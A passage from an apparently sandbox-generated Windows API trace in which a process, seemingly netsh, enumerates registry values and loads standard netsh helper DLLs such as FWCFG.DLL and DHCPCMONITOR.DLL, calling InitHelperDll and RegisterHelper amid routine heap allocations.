hHeap=0x4f0000, dwFlags=0x0, lpMem=0x50bfa8 | out: hHeap=0x4f0000) returned 1 [0091.798] RegisterHelper () returned 0x0 [0091.798] GetProcessHeap () returned 0x4f0000 [0091.798] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1f8) returned 0x50bf58 [0091.798] GetProcessHeap () returned 0x4f0000 [0091.798] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x50bda0 | out: hHeap=0x4f0000) returned 1 [0091.798] RegEnumValueW (in: hKey=0xac, dwIndex=0x1, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="nshwfp", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0091.798] _wcsicmp (_String1="nshwfp.dll", _String2="ipxmontr.dll") returned 5 [0091.798] _wcsicmp (_String1="nshwfp.dll", _String2="ipxpromn.dll") returned 5 [0091.798] GetProcessHeap () returned 0x4f0000 [0091.798] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x3c) returned 0x507950 [0091.798] GetProcessHeap () returned 0x4f0000 [0091.798] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xe) returned 0x508b60 [0091.798] GetProcessHeap () returned 0x4f0000 [0091.798] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x16) returned 0x507748 [0091.798] _wcsupr (in: _String="nshwfp.dll" | out: _String="NSHWFP.DLL") returned="NSHWFP.DLL" [0091.798] GetProcessHeap () returned 0x4f0000 [0091.798] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5072b8 | out: hHeap=0x4f0000) returned 1 [0091.798] LoadLibraryW (lpLibFileName="NSHWFP.DLL") returned 0x71af0000 [0092.509] GetProcAddress (hModule=0x71af0000, lpProcName="InitHelperDll") returned 0x71b4bbb2 [0092.509] InitHelperDll () returned 0x0 [0092.509] RegisterHelper () returned 0x0 [0092.509] GetProcessHeap () returned 0x4f0000 [0092.509] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x240) returned 0x5118c0 [0092.509] GetProcessHeap () returned 0x4f0000 [0092.509] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x50bf58 | out: hHeap=0x4f0000) returned 1 [0092.509] RegEnumValueW (in: hKey=0xac, dwIndex=0x2, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="dhcpclient", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0092.509] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxmontr.dll") returned -5 [0092.510] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxpromn.dll") returned -5 [0092.510] GetProcessHeap () returned 0x4f0000 [0092.510] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x50) returned 0x50bf58 [0092.510] GetProcessHeap () returned 0x4f0000 [0092.510] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x16) returned 0x507270 [0092.510] GetProcessHeap () returned 0x4f0000 [0092.510] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x22) returned 0x510cc0 [0092.510] _wcsupr (in: _String="dhcpcmonitor.dll" | out: _String="DHCPCMONITOR.DLL") returned="DHCPCMONITOR.DLL" [0092.510] GetProcessHeap () returned 0x4f0000 [0092.510] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x507950 | out: hHeap=0x4f0000) returned 1 [0092.510] LoadLibraryW (lpLibFileName="DHCPCMONITOR.DLL") returned 0x71ad0000 [0094.133] GetProcAddress (hModule=0x71ad0000, lpProcName="InitHelperDll") returned 0x71ad1cd4 [0094.133] InitHelperDll () returned 0x0 [0094.133] RegisterHelper () returned 0x0 [0094.133] GetProcessHeap () returned 0x4f0000 [0094.133] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x288) returned 0x515428 [0094.133] GetProcessHeap () returned 0x4f0000 [0094.133] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5118c0 | out: hHeap=0x4f0000) returned 1 [0094.134] RegEnumValueW (in: hKey=0xac, dwIndex=0x3, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="wshelper", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0094.134] _wcsicmp (_String1="wshelper.dll", _String2="ipxmontr.dll") returned 14 [0094.134] _wcsicmp (_String1="wshelper.dll", _String2="ipxpromn.dll") returned 14 [0094.134] GetProcessHeap () returned 0x4f0000 [0094.134] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x64) returned 0x5118c0 [0094.134] GetProcessHeap () returned 0x4f0000 [0094.134] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x12) returned 0x512d88 [0094.134] GetProcessHeap () returned 0x4f0000 [0094.134] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1a) returned 0x512440 [0094.134] _wcsupr (in: _String="wshelper.dll" | out: _String="WSHELPER.DLL") returned="WSHELPER.DLL" [0094.134] GetProcessHeap () returned 0x4f0000 [0094.134] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x50bf58 | out: hHeap=0x4f0000) returned 1 [0094.134] LoadLibraryW (lpLibFileName="WSHELPER.DLL") returned 0x71a00000 [0094.605] GetProcAddress (hModule=0x71a00000, lpProcName="InitHelperDll") returned 0x71a0157b [0094.605] InitHelperDll () returned 0x0 [0094.613] RegisterHelper () returned 0x0 [0094.613] GetProcessHeap () returned 0x4f0000 [0094.613] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2d0) returned 0x516848 [0094.613] GetProcessHeap () returned 0x4f0000 [0094.614] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x515428 | out: hHeap=0x4f0000) returned 1 [0094.614] RegEnumValueW (in: hKey=0xac, dwIndex=0x4, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="nshhttp", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0094.614] _wcsicmp (_String1="nshhttp.dll", _String2="ipxmontr.dll") returned 5 [0094.614] _wcsicmp (_String1="nshhttp.dll", _String2="ipxpromn.dll") returned 5 [0094.614] GetProcessHeap () returned 0x4f0000 [0094.614] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x78) returned 0x500210 [0094.614] GetProcessHeap () returned 0x4f0000 [0094.614] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x5145d0 [0094.614] GetProcessHeap () returned 0x4f0000 [0094.614] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x18) returned 0x512dc8 [0094.614] _wcsupr (in: _String="nshhttp.dll" | out: _String="NSHHTTP.DLL") returned="NSHHTTP.DLL" [0094.614] GetProcessHeap () returned 0x4f0000 [0094.614] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5118c0 | out: hHeap=0x4f0000) returned 1 [0094.614] LoadLibraryW (lpLibFileName="NSHHTTP.DLL") returned 0x719a0000 [0094.831] GetProcAddress (hModule=0x719a0000, lpProcName="InitHelperDll") returned 0x719a1b47 [0094.831] InitHelperDll () returned 0x0 [0094.831] RegisterHelper () returned 0x0 [0094.831] GetProcessHeap () returned 0x4f0000 [0094.831] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x318) returned 0x517320 [0094.832] GetProcessHeap () returned 0x4f0000 [0094.832] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x516848 | out: hHeap=0x4f0000) returned 1 [0094.832] RegEnumValueW (in: hKey=0xac, dwIndex=0x5, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="fwcfg", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0094.832] _wcsicmp (_String1="fwcfg.dll", _String2="ipxmontr.dll") returned -3 [0094.832] _wcsicmp (_String1="fwcfg.dll", _String2="ipxpromn.dll") returned -3 [0094.832] GetProcessHeap () returned 0x4f0000 [0094.832] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8c) returned 0x511a58 [0094.832] GetProcessHeap () returned 0x4f0000 [0094.832] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x516b80 [0094.832] GetProcessHeap () returned 0x4f0000 [0094.832] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x14) returned 0x512de8 [0094.832] _wcsupr (in: _String="fwcfg.dll" | out: _String="FWCFG.DLL") returned="FWCFG.DLL" [0094.832] GetProcessHeap () returned 0x4f0000 [0094.832] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x500210 | out: hHeap=0x4f0000) returned 1 [0094.832] LoadLibraryW (lpLibFileName="FWCFG.DLL") returned 0x71970000 [0095.240] GetProcAddress (hModule=0x71970000, lpProcName="InitHelperDll") returned 0x71972a30 [0095.240] InitHelperDll () returned 0x0 [0095.240] RegisterHelper () returned 0x0 [0095.240] GetProcessHeap () returned 0x4f0000 [0095.241] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x360) returned 0x519e40 [0095.241] GetProcessHeap () returned 0x4f0000 [0095.241] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x517320 | out: hHeap=0x4f0000) returned 1 [0095.241] RegEnumValueW (in: hKey=0xac, dwIndex=0x6, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="authfwcfg", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0095.241] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxmontr.dll") returned -8 [0095.241] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxpromn.dll") returned -8 [0095.241] GetProcessHeap () returned 0x4f0000 [0095.241] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xa0) returned 0x515500 [0095.241] GetProcessHeap () returned 0x4f0000 [0095.241] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x14) returned 0x512e08 [0095.241] GetProcessHeap () returned 0x4f0000 [0095.241] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1c) returned 0x519680 [0095.241] _wcsupr (in: _String="authfwcfg.dll" | out: _String="AUTHFWCFG.DLL") returned="AUTHFWCFG.DLL" [0095.241] GetProcessHeap () returned 0x4f0000 [0095.241] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x511a58 | out: hHeap=0x4f0000) returned 1 [0095.241] LoadLibraryW (lpLibFileName="AUTHFWCFG.DLL") returned 0x71890000 [0095.982] GetProcAddress (hModule=0x71890000, lpProcName="InitHelperDll") returned 0x71894420 [0095.982] InitHelperDll () returned 0x0 [0096.030] RegisterHelper () returned 0x0 [0096.030] GetProcessHeap () returned 0x4f0000 [0096.030] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x3a8) returned 0x51a958 [0096.030] GetProcessHeap () returned 0x4f0000 [0096.030] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x519e40 | out: hHeap=0x4f0000) returned 1 [0096.030] RegisterHelper () returned 0x0 [0096.030] GetProcessHeap () returned 0x4f0000 [0096.030] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x3f0) returned 0x51ad08 [0096.030] GetProcessHeap () returned 0x4f0000 [0096.031] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51a958 | out: hHeap=0x4f0000) returned 1 [0096.031] RegisterHelper () returned 0x0 [0096.031] GetProcessHeap () returned 0x4f0000 [0096.031] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x438) returned 0x51b100 [0096.031] GetProcessHeap () returned 0x4f0000 [0096.031] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51ad08 | out: hHeap=0x4f0000) returned 1 [0096.031] RegisterHelper () returned 0x0 [0096.031] GetProcessHeap () returned 0x4f0000 [0096.031] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x480) returned 0x51a958 [0096.031] GetProcessHeap () returned 0x4f0000 [0096.031] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51b100 | out: hHeap=0x4f0000) returned 1 [0096.031] RegisterHelper () returned 0x0 [0096.031] GetProcessHeap () returned 0x4f0000 [0096.031] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x4c8) returned 0x51ade0 [0096.031] GetProcessHeap () returned 0x4f0000 [0096.031] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51a958 | out: hHeap=0x4f0000) returned 1 [0096.031] RegEnumValueW (in: hKey=0xac, dwIndex=0x7, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="2", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0096.031] _wcsicmp (_String1="ifmon.dll", _String2="ipxmontr.dll") returned -10 [0096.031] _wcsicmp (_String1="ifmon.dll", _String2="ipxpromn.dll") returned -10 [0096.031] GetProcessHeap () returned 0x4f0000 [0096.031] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xb4) returned 0x5155a8 [0096.031] GetProcessHeap () returned 0x4f0000 [0096.031] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x4) returned 0x506f78 [0096.032] GetProcessHeap () returned 0x4f0000 [0096.032] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x14) returned 0x512ec8 [0096.032] _wcsupr (in: _String="ifmon.dll" | out: _String="IFMON.DLL") returned="IFMON.DLL" [0096.032] GetProcessHeap () returned 0x4f0000 [0096.032] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x515500 | out: hHeap=0x4f0000) returned 1 [0096.032] LoadLibraryW (lpLibFileName="IFMON.DLL") returned 0x71860000 [0096.442] GetProcAddress (hModule=0x71860000, lpProcName="InitHelperDll") returned 0x718617a3 [0096.442] InitHelperDll () returned 0x0 [0096.442] RegisterHelper () returned 0x0 [0096.442] GetProcessHeap () returned 0x4f0000 [0096.442] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x510) returned 0x51b2b0 [0096.442] GetProcessHeap () returned 0x4f0000 [0096.442] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51ade0 | out: hHeap=0x4f0000) returned 1 [0096.442] RegEnumValueW (in: hKey=0xac, dwIndex=0x8, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="netiohlp", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0096.442] _wcsicmp (_String1="netiohlp.dll", _String2="ipxmontr.dll") returned 5 [0096.442] _wcsicmp (_String1="netiohlp.dll", _String2="ipxpromn.dll") returned 5 [0096.442] GetProcessHeap () returned 0x4f0000 [0096.442] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc8) returned 0x5168f0 [0096.442] GetProcessHeap () returned 0x4f0000 [0096.442] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x12) returned 0x512fe8 [0096.442] GetProcessHeap () returned 0x4f0000 [0096.442] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1a) returned 0x519d60 [0096.442] _wcsupr (in: _String="netiohlp.dll" | out: _String="NETIOHLP.DLL") returned="NETIOHLP.DLL" [0096.442] GetProcessHeap () returned 0x4f0000 [0096.442] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5155a8 | out: hHeap=0x4f0000) returned 1 [0096.442] LoadLibraryW (lpLibFileName="NETIOHLP.DLL") returned 0x71800000 [0097.003] GetProcAddress (hModule=0x71800000, lpProcName="InitHelperDll") returned 0x71816e4b [0097.003] InitHelperDll () returned 0x0 [0097.003] RegisterHelper () returned 0x0 [0097.003] GetProcessHeap () returned 0x4f0000 [0097.003] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x558) returned 0x51bfc8 [0097.003] GetProcessHeap () returned 0x4f0000 [0097.003] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51b2b0 | out: hHeap=0x4f0000) returned 1 [0097.003] RegisterHelper () returned 0x0 [0097.003] GetProcessHeap () returned 0x4f0000 [0097.003] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x5a0) returned 0x51b1c0 [0097.003] GetProcessHeap () returned 0x4f0000 [0097.003] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51bfc8 | out: hHeap=0x4f0000) returned 1 [0097.003] RegisterHelper () returned 0x0 [0097.003] GetProcessHeap () returned 0x4f0000 [0097.003] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x5e8) returned 0x51bfc8 [0097.003] GetProcessHeap () returned 0x4f0000 [0097.003] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51b1c0 | out: hHeap=0x4f0000) returned 1 [0097.003] RegisterHelper () returned 0x0 [0097.003] GetProcessHeap () returned 0x4f0000 [0097.003] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x630) returned 0x51c5b8 [0097.004] GetProcessHeap () returned 0x4f0000 [0097.004] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51bfc8 | out: hHeap=0x4f0000) returned 1 [0097.004] RegisterHelper () returned 0x0 [0097.004] GetProcessHeap () returned 0x4f0000 [0097.004] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x678) returned 0x51cbf0 [0097.004] GetProcessHeap () returned 0x4f0000 [0097.004] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51c5b8 | out: hHeap=0x4f0000) returned 1 [0097.004] RegisterHelper () returned 0x0 [0097.004] GetProcessHeap () returned 0x4f0000 [0097.004] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x6c0) returned 0x51bfc8 [0097.004] GetProcessHeap () returned 0x4f0000 [0097.004] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51cbf0 | out: hHeap=0x4f0000) returned 1 [0097.004] RegisterHelper () returned 0x0 [0097.004] GetProcessHeap () returned 0x4f0000 [0097.004] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x708) returned 0x51c690 [0097.004] GetProcessHeap () returned 0x4f0000 [0097.004] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51bfc8 | out: hHeap=0x4f0000) returned 1 [0097.004] RegisterHelper () returned 0x0 [0097.004] GetProcessHeap () returned 0x4f0000 [0097.004] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x750) returned 0x51cda0 [0097.004] GetProcessHeap () returned 0x4f0000 [0097.004] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51c690 | out: hHeap=0x4f0000) returned 1 [0097.004] RegisterHelper () returned 0x0 [0097.004] GetProcessHeap () returned 0x4f0000 [0097.004] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x798) returned 0x51d4f8 [0097.004] GetProcessHeap () returned 0x4f0000 [0097.005] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51cda0 | out: hHeap=0x4f0000) returned 1 [0097.005] RegEnumValueW (in: hKey=0xac, dwIndex=0x9, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="whhelper", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0097.005] _wcsicmp (_String1="whhelper.dll", _String2="ipxmontr.dll") returned 14 [0097.005] _wcsicmp (_String1="whhelper.dll", _String2="ipxpromn.dll") returned 14 [0097.005] GetProcessHeap () returned 0x4f0000 [0097.005] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xdc) returned 0x515568 [0097.005] GetProcessHeap () returned 0x4f0000 [0097.005] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x12) returned 0x513008 [0097.005] GetProcessHeap () returned 0x4f0000 [0097.005] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1a) returned 0x51b858 [0097.005] _wcsupr (in: _String="whhelper.dll" | out: _String="WHHELPER.DLL") returned="WHHELPER.DLL" [0097.005] GetProcessHeap () returned 0x4f0000 [0097.005] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5168f0 | out: hHeap=0x4f0000) returned 1 [0097.005] LoadLibraryW (lpLibFileName="WHHELPER.DLL") returned 0x717a0000 [0097.551] GetProcAddress (hModule=0x717a0000, lpProcName="InitHelperDll") returned 0x717a1c99 [0097.551] InitHelperDll () returned 0x0 [0097.551] RegisterHelper () returned 0x0 [0097.551] GetProcessHeap () returned 0x4f0000 [0097.551] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x7e0) returned 0x51bfc8 [0097.551] GetProcessHeap () returned 0x4f0000 [0097.551] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51d4f8 | out: hHeap=0x4f0000) returned 1 [0097.551] RegEnumValueW (in: hKey=0xac, dwIndex=0xa, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="hnetmon", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0097.551] _wcsicmp (_String1="hnetmon.dll", _String2="ipxmontr.dll") returned -1 [0097.551] _wcsicmp (_String1="hnetmon.dll", _String2="ipxpromn.dll") returned -1 [0097.551] GetProcessHeap () returned 0x4f0000 [0097.551] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xf0) returned 0x5168f0 [0097.551] GetProcessHeap () returned 0x4f0000 [0097.551] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x51b120 [0097.551] GetProcessHeap () returned 0x4f0000 [0097.551] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x18) returned 0x513028 [0097.551] _wcsupr (in: _String="hnetmon.dll" | out: _String="HNETMON.DLL") returned="HNETMON.DLL" [0097.551] GetProcessHeap () returned 0x4f0000 [0097.551] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x515568 | out: hHeap=0x4f0000) returned 1 [0097.551] LoadLibraryW (lpLibFileName="HNETMON.DLL") returned 0x716e0000 [0098.690] GetProcAddress (hModule=0x716e0000, lpProcName="InitHelperDll") returned 0x716e200c [0098.690] InitHelperDll () returned 0x0 [0098.691] RegisterHelper () returned 0x0 [0098.691] GetProcessHeap () returned 0x4f0000 [0098.691] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x828) returned 0x51c7b0 [0098.691] GetProcessHeap () returned 0x4f0000 [0098.691] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51bfc8 | out: hHeap=0x4f0000) returned 1 [0098.691] RegEnumValueW (in: hKey=0xac, dwIndex=0xb, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="rpc", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0098.691] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxmontr.dll") returned 9 [0098.691] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxpromn.dll") returned 9 [0098.691] GetProcessHeap () returned 0x4f0000 [0098.691] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x104) returned 0x5169e8 [0098.691] GetProcessHeap () returned 0x4f0000 [0098.691] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506fe8 [0098.691] GetProcessHeap () returned 0x4f0000 [0098.691] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x16) returned 0x513048 [0098.691] _wcsupr (in: _String="rpcnsh.dll" | out: _String="RPCNSH.DLL") returned="RPCNSH.DLL" [0098.691] GetProcessHeap () returned 0x4f0000 [0098.691] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5168f0 | out: hHeap=0x4f0000) returned 1 [0098.691] LoadLibraryW (lpLibFileName="RPCNSH.DLL") returned 0x71450000 [0098.829] GetProcAddress (hModule=0x71450000, lpProcName="InitHelperDll") returned 0x71452f94 [0098.829] InitHelperDll () returned 0x0 [0098.829] RegisterHelper () returned 0x0 [0098.829] GetProcessHeap () returned 0x4f0000 [0098.829] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x870) returned 0x51cfe0 [0098.829] GetProcessHeap () returned 0x4f0000 [0098.829] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51c7b0 | out: hHeap=0x4f0000) returned 1 [0098.829] RegisterHelper () returned 0x0 [0098.829] GetProcessHeap () returned 0x4f0000 [0098.829] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8b8) returned 0x51bfc8 [0098.829] GetProcessHeap () returned 0x4f0000 [0098.829] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51cfe0 | out: hHeap=0x4f0000) returned 1 [0098.829] RegEnumValueW (in: hKey=0xac, dwIndex=0xc, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="dot3cfg", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0098.830] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxmontr.dll") returned -5 [0098.830] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxpromn.dll") returned -5 [0098.830] GetProcessHeap () returned 0x4f0000 [0098.830] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x118) returned 0x517320 [0098.830] GetProcessHeap () returned 0x4f0000 [0098.830] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x51b490 [0098.830] GetProcessHeap () returned 0x4f0000 [0098.830] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x18) returned 0x513068 [0098.830] _wcsupr (in: _String="dot3cfg.dll" | out: _String="DOT3CFG.DLL") returned="DOT3CFG.DLL" [0098.830] GetProcessHeap () returned 0x4f0000 [0098.830] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5169e8 | out: hHeap=0x4f0000) returned 1 [0098.830] LoadLibraryW (lpLibFileName="DOT3CFG.DLL") returned 0x71430000 [0102.345] GetProcAddress (hModule=0x71430000, lpProcName="InitHelperDll") returned 0x7143a31d [0102.345] InitHelperDll () returned 0x0 [0102.345] RegisterHelper () returned 0x0 [0102.345] GetProcessHeap () returned 0x4f0000 [0102.345] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x900) returned 0x51d488 [0102.345] GetProcessHeap () returned 0x4f0000 [0102.345] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51bfc8 | out: hHeap=0x4f0000) returned 1 [0102.345] RegEnumValueW (in: hKey=0xac, dwIndex=0xd, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="napmontr", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0102.345] _wcsicmp (_String1="napmontr.dll", _String2="ipxmontr.dll") returned 5 [0102.345] _wcsicmp (_String1="napmontr.dll", _String2="ipxpromn.dll") returned 5 [0102.345] GetProcessHeap () returned 0x4f0000 [0102.345] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x12c) returned 0x517440 [0102.345] GetProcessHeap () returned 0x4f0000 [0102.345] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x12) returned 0x513088 [0102.345] GetProcessHeap () returned 0x4f0000 [0102.346] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1a) returned 0x51cf98 [0102.346] _wcsupr (in: _String="napmontr.dll" | out: _String="NAPMONTR.DLL") returned="NAPMONTR.DLL" [0102.346] GetProcessHeap () returned 0x4f0000 [0102.346] HeapFree (in: hHeap=0x4f0000, 